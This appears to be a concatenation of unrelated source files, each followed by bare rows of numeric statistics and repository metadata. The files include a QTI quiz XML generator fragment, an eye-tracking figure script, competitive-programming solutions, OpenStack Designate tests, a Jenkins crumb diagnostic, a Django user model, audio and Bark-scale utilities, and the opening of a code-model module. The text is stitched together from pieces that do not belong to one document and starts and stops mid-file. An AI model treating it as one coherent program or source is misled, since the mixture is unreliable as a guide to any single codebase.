elif question.type == 'short_answer_question': xml.append(ITEM_PRESENTATION_SHORTANS.format(question_html_xml=question.question_html_xml)) elif question.type == 'numerical_question': xml.append(ITEM_PRESENTATION_NUM.format(question_html_xml=question.question_html_xml)) elif question.type == 'essay_question': xml.append(ITEM_PRESENTATION_ESSAY.format(question_html_xml=question.question_html_xml)) elif question.type == 'file_upload_question': xml.append(ITEM_PRESENTATION_UPLOAD.format(question_html_xml=question.question_html_xml)) else: raise ValueError if question.type in ('true_false_question', 'multiple_choice_question'): correct_choice = None for choice in question.choices: if choice.correct: correct_choice = choice break if correct_choice is None: raise TypeError resprocessing = [] resprocessing.append(ITEM_RESPROCESSING_START) if question.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK) for choice in question.choices: if choice.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}')) if question.correct_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MCTF_SET_CORRECT_WITH_FEEDBACK.format(ident=f'text2qti_choice_{correct_choice.id}')) else: resprocessing.append(ITEM_RESPROCESSING_MCTF_SET_CORRECT_NO_FEEDBACK.format(ident=f'text2qti_choice_{correct_choice.id}')) if question.incorrect_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK) resprocessing.append(ITEM_RESPROCESSING_END) xml.extend(resprocessing) elif question.type == 'short_answer_question': resprocessing = [] resprocessing.append(ITEM_RESPROCESSING_START) if question.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_SHORTANS_GENERAL_FEEDBACK) for choice in question.choices: if choice.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_SHORTANS_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}', answer_xml=choice.choice_xml)) varequal = [] for choice in question.choices: varequal.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_VAREQUAL.format(answer_xml=choice.choice_xml)) if question.correct_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_WITH_FEEDBACK.format(varequal='\n'.join(varequal))) else: resprocessing.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_NO_FEEDBACK.format(varequal='\n'.join(varequal))) if question.incorrect_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_SHORTANS_INCORRECT_FEEDBACK) resprocessing.append(ITEM_RESPROCESSING_END) xml.extend(resprocessing) elif question.type == 'multiple_answers_question': resprocessing = [] resprocessing.append(ITEM_RESPROCESSING_START) if question.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MULTANS_GENERAL_FEEDBACK) for choice in question.choices: if choice.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MULTANS_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}')) varequal = [] for choice in question.choices: if choice.correct: varequal.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_CORRECT.format(ident=f'text2qti_choice_{choice.id}')) else: varequal.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_INCORRECT.format(ident=f'text2qti_choice_{choice.id}')) if question.correct_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_WITH_FEEDBACK.format(varequal='\n'.join(varequal))) else: 
resprocessing.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_NO_FEEDBACK.format(varequal='\n'.join(varequal))) if question.incorrect_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MULTANS_INCORRECT_FEEDBACK) resprocessing.append(ITEM_RESPROCESSING_END) xml.extend(resprocessing) elif question.type == 'numerical_question': xml.append(ITEM_RESPROCESSING_START) if question.feedback_raw is not None: xml.append(ITEM_RESPROCESSING_NUM_GENERAL_FEEDBACK) if question.correct_feedback_raw is None: if question.numerical_exact is None: item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_NO_FEEDBACK else: item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_NO_FEEDBACK else: if question.numerical_exact is None: item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_WITH_FEEDBACK else: item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_WITH_FEEDBACK xml.append(item_resprocessing_num_set_correct.format(num_min=question.numerical_min_html_xml, num_exact=question.numerical_exact_html_xml, num_max=question.numerical_max_html_xml)) if question.incorrect_feedback_raw is not None: xml.append(ITEM_RESPROCESSING_NUM_INCORRECT_FEEDBACK) xml.append(ITEM_RESPROCESSING_END) elif question.type == 'essay_question': xml.append(ITEM_RESPROCESSING_START) xml.append(ITEM_RESPROCESSING_ESSAY) if question.feedback_raw is not None: xml.append(ITEM_RESPROCESSING_ESSAY_GENERAL_FEEDBACK) xml.append(ITEM_RESPROCESSING_END) elif question.type == 'file_upload_question': xml.append(ITEM_RESPROCESSING_START) if question.feedback_raw is not None: xml.append(ITEM_RESPROCESSING_UPLOAD_GENERAL_FEEDBACK) xml.append(ITEM_RESPROCESSING_END) else: raise ValueError if question.type in ('true_false_question', 'multiple_choice_question', 'short_answer_question', 'multiple_answers_question', 'numerical_question', 'essay_question', 'file_upload_question'): if question.feedback_raw is not None: xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_GENERAL.format(feedback=question.feedback_html_xml)) if question.correct_feedback_raw is not None: xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_CORRECT.format(feedback=question.correct_feedback_html_xml)) if question.incorrect_feedback_raw is not None: xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INCORRECT.format(feedback=question.incorrect_feedback_html_xml)) if question.type in ('true_false_question', 'multiple_choice_question', 'short_answer_question', 'multiple_answers_question'): for choice in question.choices: if choice.feedback_raw is not None: xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INDIVIDUAL.format(ident=f'text2qti_choice_{choice.id}', feedback=choice.feedback_html_xml)) xml.append(END_ITEM) xml.append(AFTER_ITEMS) return ''.join(xml)
40.474164
260
0.629769
2,487
26,632
6.386409
0.081624
0.087767
0.052131
0.047598
0.781842
0.714789
0.658377
0.619027
0.559529
0.494302
0
0.006305
0.273393
26,632
657
261
40.535769
0.81448
0.010063
0
0.640212
0
0.001764
0.470215
0.159497
0
0
0
0
0
1
0.001764
false
0
0.001764
0
0.005291
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc09cc4c599dae963fa070fbe9dc0b9a5e9e17c9
1,425
py
Python
code/figure_warp.py
jwcarr/drift
a514c5970ba53025cc142257e953c1bda3cd049c
[ "CC-BY-4.0" ]
2
2021-11-19T10:12:58.000Z
2021-11-30T03:33:59.000Z
code/figure_warp.py
jwcarr/vertical_drift
5b4b6c475b5118950514dc01960391ef0d95bd19
[ "CC-BY-4.0" ]
null
null
null
code/figure_warp.py
jwcarr/vertical_drift
5b4b6c475b5118950514dc01960391ef0d95bd19
[ "CC-BY-4.0" ]
null
null
null
import numpy as np
import eyekit
import algorithms
import core

data = eyekit.io.load(core.FIXATIONS / 'sample.json')
passages = eyekit.io.load(core.DATA / 'passages.json')

original_sequence = data['trial_5']['fixations']

fixation_XY = np.array([fixation.xy for fixation in original_sequence], dtype=int)
word_XY = np.array([word.center for word in passages['1B'].words(alphabetical_only=False)], dtype=int)

start_times = np.array([i*100 for i in range(len(word_XY))], dtype=int)
expected_sequence = eyekit.FixationSequence(np.column_stack([word_XY, start_times, start_times+100]))

diagram = eyekit.vis.Image(1920, 1080)
diagram.draw_text_block(passages['1B'], mask_text=True)
diagram.draw_fixation_sequence(expected_sequence, color='#E32823', fixation_radius=6)
diagram.draw_fixation_sequence(original_sequence, color='#205E84', fixation_radius=6)

_, warping_path = algorithms.dynamic_time_warping(fixation_XY, word_XY)

for fixation, mapped_words in zip(original_sequence, warping_path):
    for word_i in mapped_words:
        word_x, word_y = word_XY[word_i]
        diagram.draw_line(fixation.xy, (word_x, word_y), color='black', stroke_width=0.5, dashed=True)

fig = eyekit.vis.Figure()
fig.add_image(diagram)
fig.set_crop_margin(2)
fig.set_padding(vertical=2, horizontal=3, edge=1)
fig.set_enumeration(False)
fig.save(core.VISUALS / 'illustration_warp.pdf', width=83)
# fig.save(core.FIGS / 'fig02_single_column.eps', width=83)
39.583333
102
0.781754
224
1,425
4.745536
0.424107
0.028222
0.022578
0.030103
0
0
0
0
0
0
0
0.031418
0.084211
1,425
35
103
40.714286
0.783142
0.04
0
0
0
0
0.061493
0.015373
0
0
0
0
0
1
0
false
0.115385
0.153846
0
0.153846
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc109f21dbb2efc4b477a59e275c911d6c56316e
221
py
Python
ABC/abc001-abc050/abc007/b.py
KATO-Hiro/AtCoder
cbbdb18e95110b604728a54aed83a6ed6b993fde
[ "CC0-1.0" ]
2
2020-06-12T09:54:23.000Z
2021-05-04T01:34:07.000Z
ABC/abc001-abc050/abc007/b.py
KATO-Hiro/AtCoder
cbbdb18e95110b604728a54aed83a6ed6b993fde
[ "CC0-1.0" ]
961
2020-06-23T07:26:22.000Z
2022-03-31T21:34:52.000Z
ABC/abc001-abc050/abc007/b.py
KATO-Hiro/AtCoder
cbbdb18e95110b604728a54aed83a6ed6b993fde
[ "CC0-1.0" ]
null
null
null
# -*- coding: utf-8 -*-


def main():
    a = input()

    # See:
    # https://www.slideshare.net/chokudai/abc007
    if a == 'a':
        print('-1')
    else:
        print('a')


if __name__ == '__main__':
    main()
13
48
0.466063
26
221
3.653846
0.730769
0
0
0
0
0
0
0
0
0
0
0.033333
0.321267
221
16
49
13.8125
0.6
0.312217
0
0
0
0
0.081081
0
0
0
0
0
0
1
0.125
false
0
0
0
0.125
0.25
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc11f9bf036f8314167de520f758c42b9fa4aa63
2,306
py
Python
designate-8.0.0/designate/tests/test_api/test_v2/test_limits.py
scottwedge/OpenStack-Stein
7077d1f602031dace92916f14e36b124f474de15
[ "Apache-2.0" ]
145
2015-01-02T09:35:53.000Z
2021-12-14T17:03:53.000Z
designate/tests/test_api/test_v2/test_limits.py
sapcc/designate
c3f084751006a2fe7562f137930542c4759d6fd9
[ "Apache-2.0" ]
6
2015-03-15T00:22:27.000Z
2019-12-16T09:37:38.000Z
designate/tests/test_api/test_v2/test_limits.py
sapcc/designate
c3f084751006a2fe7562f137930542c4759d6fd9
[ "Apache-2.0" ]
109
2015-01-13T16:47:34.000Z
2021-03-15T13:18:48.000Z
# Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Author: Kiall Mac Innes <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg

from designate.tests.test_api.test_v2 import ApiV2TestCase


class ApiV2LimitsTest(ApiV2TestCase):
    def test_get_limits(self):
        response = self.client.get('/limits/')

        self.assertEqual(200, response.status_int)
        self.assertEqual('application/json', response.content_type)

        self.assertIn('max_zones', response.json)
        self.assertIn('max_zone_records', response.json)
        self.assertIn('max_zone_recordsets', response.json)
        self.assertIn('max_recordset_records', response.json)
        self.assertIn('min_ttl', response.json)
        self.assertIn('max_zone_name_length', response.json)
        self.assertIn('max_recordset_name_length', response.json)
        self.assertIn('max_page_limit', response.json)

        absolutelimits = response.json

        self.assertEqual(cfg.CONF.quota_zones, absolutelimits['max_zones'])
        self.assertEqual(cfg.CONF.quota_zone_records,
                         absolutelimits['max_zone_recordsets'])
        self.assertEqual(cfg.CONF['service:central'].min_ttl,
                         absolutelimits['min_ttl'])
        self.assertEqual(cfg.CONF['service:central'].max_zone_name_len,
                         absolutelimits['max_zone_name_length'])
        self.assertEqual(cfg.CONF['service:central'].max_recordset_name_len,
                         absolutelimits['max_recordset_name_length'])
        self.assertEqual(cfg.CONF['service:api'].max_limit_v2,
                         absolutelimits['max_page_limit'])
41.927273
76
0.667823
274
2,306
5.448905
0.434307
0.072338
0.085733
0.112525
0.312793
0.251172
0.134628
0
0
0
0
0.009106
0.238075
2,306
54
77
42.703704
0.840637
0.270598
0
0.15625
0
0
0.183073
0.042617
0
0
0
0
0.5
1
0.03125
false
0
0.0625
0
0.125
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
1
fc1210baa0e8a8267a154dad6a47b17fe2942673
1,696
py
Python
pythonAnimations/pyOpenGLChess/engineDirectory/oglc-env/lib/python2.7/site-packages/OpenGLContext/scenegraph/nodepath.py
alexus37/AugmentedRealityChess
7f600ad153270feff12aa7aa86d7ed0a49ebc71c
[ "MIT" ]
1
2015-07-12T07:24:17.000Z
2015-07-12T07:24:17.000Z
pythonAnimations/pyOpenGLChess/engineDirectory/oglc-env/lib/python2.7/site-packages/OpenGLContext/scenegraph/nodepath.py
alexus37/AugmentedRealityChess
7f600ad153270feff12aa7aa86d7ed0a49ebc71c
[ "MIT" ]
null
null
null
pythonAnimations/pyOpenGLChess/engineDirectory/oglc-env/lib/python2.7/site-packages/OpenGLContext/scenegraph/nodepath.py
alexus37/AugmentedRealityChess
7f600ad153270feff12aa7aa86d7ed0a49ebc71c
[ "MIT" ]
1
2016-02-19T21:55:53.000Z
2016-02-19T21:55:53.000Z
"""node-path implementation for OpenGLContext """ from vrml.vrml97 import nodepath, nodetypes from vrml.cache import CACHE from OpenGLContext import quaternion from OpenGL.GL import glMultMatrixf class _NodePath( object ): """OpenGLContext-specific node-path class At the moment this only adds a single method, transform() which traverses the path, calling transform() for each Transforming node which has a transform method. """ __slots__ = () def transform( self, mode=None, translate=1, scale=1, rotate=1 ): """For each Transforming node, do OpenGL transform Does _not_ push-pop matrices, so do that before if you want to save your current matrix. This method is useful primarily for storing paths to, for instance, bindable nodes, where you want to be able to rapidly transform down to the node, without needing a full traversal of the scenegraph. """ matrix = self.transformMatrix( translate=translate, scale=scale, rotate=rotate ) glMultMatrixf( matrix ) def quaternion( self ): """Get summary quaternion for all rotations in stack""" nodes = [ node for node in self if ( isinstance(node, nodetypes.Transforming) and hasattr( node, "orientation") ) ] q = quaternion.Quaternion() for node in nodes: q = q * quaternion.fromXYZR( *node.orientation ) return q class NodePath( _NodePath, nodepath.NodePath ): pass class WeakNodePath( _NodePath, nodepath.WeakNodePath ): pass
32
69
0.630896
192
1,696
5.526042
0.5
0.06032
0.035815
0.043355
0
0
0
0
0
0
0
0.004223
0.301887
1,696
52
70
32.615385
0.891892
0.373231
0
0.066667
0
0
0.011423
0
0
0
0
0
0
1
0.066667
false
0.066667
0.133333
0
0.366667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc188927db9f5bd43bd5abe64681e14292f26e08
269
py
Python
features/steps/basic_account_add_bdd.py
MhmdRyhn/behavior_test
868252e0b31596e0bff4a969745cf3b633c13695
[ "MIT" ]
null
null
null
features/steps/basic_account_add_bdd.py
MhmdRyhn/behavior_test
868252e0b31596e0bff4a969745cf3b633c13695
[ "MIT" ]
null
null
null
features/steps/basic_account_add_bdd.py
MhmdRyhn/behavior_test
868252e0b31596e0bff4a969745cf3b633c13695
[ "MIT" ]
null
null
null
import behave


@behave.when('I add $1200 to my account')
def add_usd_1200(context):
    context.account.add_cash(amount=1200)


@behave.then('It becomes $3200 in my account')
def check_for_increase_to_usd_1880(context):
    assert context.account.current_cash == 3200
22.416667
47
0.762082
43
269
4.55814
0.581395
0.091837
0.122449
0
0
0
0
0
0
0
0
0.102564
0.130112
269
11
48
24.454545
0.735043
0
0
0
0
0
0.204461
0
0
0
0
0
0.142857
1
0.285714
false
0
0.142857
0
0.428571
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
fc1fa639ebbd112d3143f8455e253cf35ff2e2c9
1,033
py
Python
src/main/resources/scripts/crumbDiag.py
cam-laf/vectorcast-execution-plugin
fd54e8580886084d040d21fa809be8a609d44d8e
[ "MIT" ]
4
2019-06-28T22:46:06.000Z
2020-05-28T08:53:37.000Z
src/main/resources/scripts/crumbDiag.py
cam-laf/vectorcast-execution-plugin
fd54e8580886084d040d21fa809be8a609d44d8e
[ "MIT" ]
18
2018-09-26T15:32:11.000Z
2021-10-01T21:57:14.000Z
src/main/resources/scripts/crumbDiag.py
cam-laf/vectorcast-execution-plugin
fd54e8580886084d040d21fa809be8a609d44d8e
[ "MIT" ]
11
2017-03-19T18:37:16.000Z
2020-04-06T19:46:09.000Z
from __future__ import print_function
import requests
import sys
import os

verbose=True

try:
    username=os.environ['USERNAME']
    password=os.environ['PASSWORD']
except:
    print("Crumb Diaganostic requires USERNAME/PASSWORD to be set as environment variables")
    sys.exit(-1)

jenkins_url=os.environ['JENKINS_URL']

url = jenkins_url + 'crumbIssuer/api/xml?xpath=concat(//crumbRequestField,":",//crumb)'
print(url)
if username:
    crumb = requests.get(url, auth=(username, password))
    if crumb.status_code == 200:
        crumb_headers = dict()
        crumb_headers[crumb.text.split(":")[0]] = crumb.text.split(":")[1]
        if verbose:
            print("Got crumb: %s" % crumb.text)
    else:
        print("Failed to get crumb")
        print("\nYou may need to enable \"Prevent Cross Site Request Forgery exploits\" from:")
        print("Manage Jenkins > Configure Global Security > CSRF Protection and select the appropriate Crumb Algorithm")
        print(jenkins_url + "/configureSecurity")
        sys.exit(-1)
35.62069
120
0.683446
131
1,033
5.29771
0.541985
0.057637
0.023055
0
0
0
0
0
0
0
0
0.008383
0.191675
1,033
28
121
36.892857
0.822754
0
0
0.074074
0
0
0.346563
0.062924
0
0
0
0
0
1
0
false
0.111111
0.148148
0
0.148148
0.296296
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc2653dfaa764320b8eb71e09ae9ebdeb59fea8c
287
py
Python
dynamic_programming/01/01-06.py
fumiyanll23/algo-method
d86ea1d399cbc5a1db0ae49d0c82e41042f661ab
[ "MIT" ]
null
null
null
dynamic_programming/01/01-06.py
fumiyanll23/algo-method
d86ea1d399cbc5a1db0ae49d0c82e41042f661ab
[ "MIT" ]
null
null
null
dynamic_programming/01/01-06.py
fumiyanll23/algo-method
d86ea1d399cbc5a1db0ae49d0c82e41042f661ab
[ "MIT" ]
null
null
null
# input
N, M = map(int, input().split())
Ds = [*map(int, input().split())]

# compute
dp = [False] * (N+1)
for ni in range(N+1):
    if ni == 0:
        dp[ni] = True

    for D in Ds:
        if ni >= D:
            dp[ni] = dp[ni] or dp[ni-D]

# output
print("Yes" if dp[-1] else "No")
17.9375
39
0.477352
52
287
2.634615
0.480769
0.116788
0.160584
0.233577
0
0
0
0
0
0
0
0.02
0.303136
287
15
40
19.133333
0.665
0.069686
0
0
0
0
0.019011
0
0
0
0
0
0
1
0
false
0
0
0
0
0.1
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc3188873ff10721356aeaf7e965132781c78f98
793
py
Python
level_one/strings.py
jameskzhao/python36
855e8a6e164065702efa7773da1f089454fdcbcc
[ "Apache-2.0" ]
null
null
null
level_one/strings.py
jameskzhao/python36
855e8a6e164065702efa7773da1f089454fdcbcc
[ "Apache-2.0" ]
null
null
null
level_one/strings.py
jameskzhao/python36
855e8a6e164065702efa7773da1f089454fdcbcc
[ "Apache-2.0" ]
null
null
null
#Basics a = "hello" a += " I'm a dog" print(a) print(len(a)) print(a[1:]) #Output: ello I'm a dog print(a[:5]) #Output: hello(index 5 is not included) print(a[2:5])#Output: llo(index 2 is included) print(a[::2])#Step size #string is immutable so you can't assign a[1]= b x = a.upper() print(x) x = a.capitalize() print(x) x = a.split('e') print(x) x = a.split() #splits the string by space print(x) x = a.strip() #removes any whitespace from beginning or the end print(x) x = a.replace('l','xxx') print(x) x = "Insert another string here: {}".format('insert me!') x = "Item One: {} Item Two: {}".format('dog', 'cat') print(x) x = "Item One: {m} Item Two: {m}".format(m='dog', n='cat') print(x) #command-line string input print("Enter your name:") x = input() print("Hello: {}".format(x))
22.027778
63
0.631778
150
793
3.34
0.426667
0.095808
0.097804
0.07984
0.0998
0.047904
0
0
0
0
0
0.011923
0.153846
793
36
64
22.027778
0.734724
0.320303
0
0.285714
0
0
0.280603
0
0
0
0
0
0
1
0
false
0
0
0
0
0.571429
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
1
fc35043bdda56bc264f387918b5687e34dea2849
1,152
py
Python
api/models/users.py
felipebarraza6/startup_comedy
42b4a4547bffc0d7cf34ace520355d80053bbd9e
[ "MIT" ]
null
null
null
api/models/users.py
felipebarraza6/startup_comedy
42b4a4547bffc0d7cf34ace520355d80053bbd9e
[ "MIT" ]
null
null
null
api/models/users.py
felipebarraza6/startup_comedy
42b4a4547bffc0d7cf34ace520355d80053bbd9e
[ "MIT" ]
null
null
null
"""User Model.""" # Django from django.db import models from django.contrib.auth.models import AbstractUser # Utilities from .utils import ApiModel class User(ApiModel, AbstractUser): email = models.EmailField( 'email', unique = True, ) USERNAME_FIELD = 'email' REQUIRED_FIELDS = ['username', 'first_name', 'last_name'] is_student = models.BooleanField(default=False) class Meta: verbose_name='Usuario' verbose_name_plural='Usuarios' def __str__(self): return self.username def get_short_name(self): return self.username class ProfileUser(ApiModel): user = models.OneToOneField(User, on_delete=models.CASCADE) approved_courses = models.ManyToManyField('api.ResultContest', related_name='user_aproved_courses', blank=True, null=True) tests_performed = models.ManyToManyField('api.ResultTest', related_name='user_result_test', blank=True) class Meta: verbose_name = 'Usuario - Perfil' verbose_name_plural = 'Usuarios - Perfiles' def __str__(self): return str(self.user)
24
71
0.667535
126
1,152
5.865079
0.492063
0.05954
0.043302
0.054127
0.073072
0
0
0
0
0
0
0
0.233507
1,152
47
72
24.510638
0.83692
0.025174
0
0.206897
0
0
0.138117
0
0
0
0
0
0
1
0.103448
false
0
0.103448
0.103448
0.689655
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
0
0
0
1
fc3a04cfd338f72934bd5d86f8126f4adfa55c05
1,330
py
Python
Compare.py
sushantPatrikar/WaveCompartor
112395287b41c1b5533924ebe293c5641647a5e3
[ "MIT" ]
3
2019-10-27T03:45:18.000Z
2022-02-21T18:50:58.000Z
Compare.py
sushantPatrikar/WaveComparator
112395287b41c1b5533924ebe293c5641647a5e3
[ "MIT" ]
null
null
null
Compare.py
sushantPatrikar/WaveComparator
112395287b41c1b5533924ebe293c5641647a5e3
[ "MIT" ]
1
2021-04-20T07:39:37.000Z
2021-04-20T07:39:37.000Z
from scipy.io import wavfile
import numpy as np
import pingouin as pg
import pandas as pd

_,data = wavfile.read('wav//ed//mp3baked.wav')
_,data1 = wavfile.read('wav//ing//ingeating.wav')

i= data.shape[0]-1
j = data1.shape[0]-1
index_1 = -1
index_2 = -1

try:
    data.shape[1]
except IndexError:
    data = data.reshape(data.shape[0],1)

try:
    data1.shape[1]
except IndexError:
    data1 = data1.reshape(data1.shape[0],1)

while True:
    if data[i,0] !=0 and index_1==-1:
        index_1 = i
        pass
    if data1[j,0] !=0 and index_2==-1:
        index_2 = j
        pass
    if index_1!=-1 and index_2!=-1:
        break
    i-=1
    j-=1

data = data[-index_1:,:]
data1 = data1[-index_2:,:]

data = data[-2000:,:]
data1= data1[-2000:,:]

x =pg.corr(x=data[:,0],y=data1[:,0])
print(x)

# print(data.tostring())
# print(data1.tostring())
# data = data[:,:]
# data1 = data1[:,:]
# data = data.reshape(data.shape[0],1)
# data1 = data1.reshape(data1.shape[0],1)
# data = data[-10000:,:]
# data1 = data1[-10000:,:]
# print(data1.shape[1])
# df = pd.DataFrame(data,data1)
# print(df.head())
# print(data1.shape)
# data = data[-5000:,:]
# data1 = data1[-5000:,:]
#
#
# x =pg.corr(x=data[:,0],y=data1[:,0])
# print(x)
15.647059
50
0.552632
201
1,330
3.597015
0.238806
0.077455
0.058091
0.045643
0.224066
0.224066
0.224066
0.071923
0.071923
0.071923
0
0.094378
0.251128
1,330
84
51
15.833333
0.631526
0.291729
0
0.171429
0
0
0.052443
0.052443
0
0
0
0
0
1
0
false
0.057143
0.114286
0
0.114286
0.028571
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc403c27d1d4da0e66a446351a2e2650278bc62d
1,527
py
Python
pyACA/ToolFreq2Bark.py
ruohoruotsi/pyACA
339e9395b65a217aa5965638af941b32d5c95454
[ "MIT" ]
81
2019-07-08T15:48:03.000Z
2022-03-21T22:52:25.000Z
pyACA/ToolFreq2Bark.py
ruohoruotsi/pyACA
339e9395b65a217aa5965638af941b32d5c95454
[ "MIT" ]
24
2019-10-03T19:20:18.000Z
2022-02-28T17:20:40.000Z
pyACA/ToolFreq2Bark.py
ruohoruotsi/pyACA
339e9395b65a217aa5965638af941b32d5c95454
[ "MIT" ]
26
2019-07-18T23:50:52.000Z
2022-03-10T14:59:35.000Z
# -*- coding: utf-8 -*- """ helper function: convert Hz to Bark scale Args: fInHz: The frequency to be converted, can be scalar or vector cModel: The name of the model ('Schroeder' [default], 'Terhardt', 'Zwicker', 'Traunmuller') Returns: Bark values of the input dimension """ import numpy as np import math def ToolFreq2Bark(fInHz, cModel = 'Schroeder'): def acaSchroeder_scalar(f): return 7 * math.asinh(f/650) def acaTerhardt_scalar(f): return 13.3 * math.atan(0.75 * f/1000) def acaZwicker_scalar(f): return 13 * math.atan(0.76 * f/1000) + 3.5 * math.atan(f/7500) def acaTraunmuller_scalar(f): return 26.81/(1+1960./f) - 0.53 f = np.asarray(fInHz) if f.ndim == 0: if cModel == 'Terhardt': return acaTerhardt_scalar(f) elif cModel == 'Zwicker': return acaZwicker_scalar(f) elif cModel == 'Traunmuller': return acaTraunmuller_scalar(f) else: return acaSchroeder_scalar(f) fBark = np.zeros(f.shape) if cModel == 'Terhardt': for k,fi in enumerate(f): fBark[k] = acaTerhardt_scalar(fi) elif cModel == 'Zwicker': for k,fi in enumerate(f): fBark[k] = acaZwicker_scalar(fi) elif cModel == 'Traunmuller': for k,fi in enumerate(f): fBark[k] = acaTraunmuller_scalar(fi) else: for k,fi in enumerate(f): fBark[k] = acaSchroeder_scalar(fi) return (fBark)
28.811321
95
0.591356
199
1,527
4.477387
0.38191
0.062851
0.058361
0.035915
0.107744
0.107744
0.107744
0.107744
0
0
0
0.040553
0.289456
1,527
52
96
29.365385
0.780645
0.18795
0
0.342857
0
0
0.049513
0
0
0
0
0
0
1
0.142857
false
0
0.057143
0.114286
0.457143
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
0
0
0
1
fc43b75bb4a6cda564bcd320da8b77c8174105e4
58,644
py
Python
bonsai/model.py
ipa-mirb/bonsai
cb73317cdf779566f7c496fc39546c9c689aa09c
[ "MIT" ]
null
null
null
bonsai/model.py
ipa-mirb/bonsai
cb73317cdf779566f7c496fc39546c9c689aa09c
[ "MIT" ]
null
null
null
bonsai/model.py
ipa-mirb/bonsai
cb73317cdf779566f7c496fc39546c9c689aa09c
[ "MIT" ]
null
null
null
#Copyright (c) 2017 Andre Santos # #Permission is hereby granted, free of charge, to any person obtaining a copy #of this software and associated documentation files (the "Software"), to deal #in the Software without restriction, including without limitation the rights #to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #copies of the Software, and to permit persons to whom the Software is #furnished to do so, subject to the following conditions: #The above copyright notice and this permission notice shall be included in #all copies or substantial portions of the Software. #THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN #THE SOFTWARE. ############################################################################### # Language Model ############################################################################### class CodeEntity(object): """Base class for all programming entities. All code objects have a file name, a line number, a column number, a programming scope (e.g. the function or code block they belong to) and a parent object that should have some variable or collection holding this object. """ def __init__(self, scope, parent): """Base 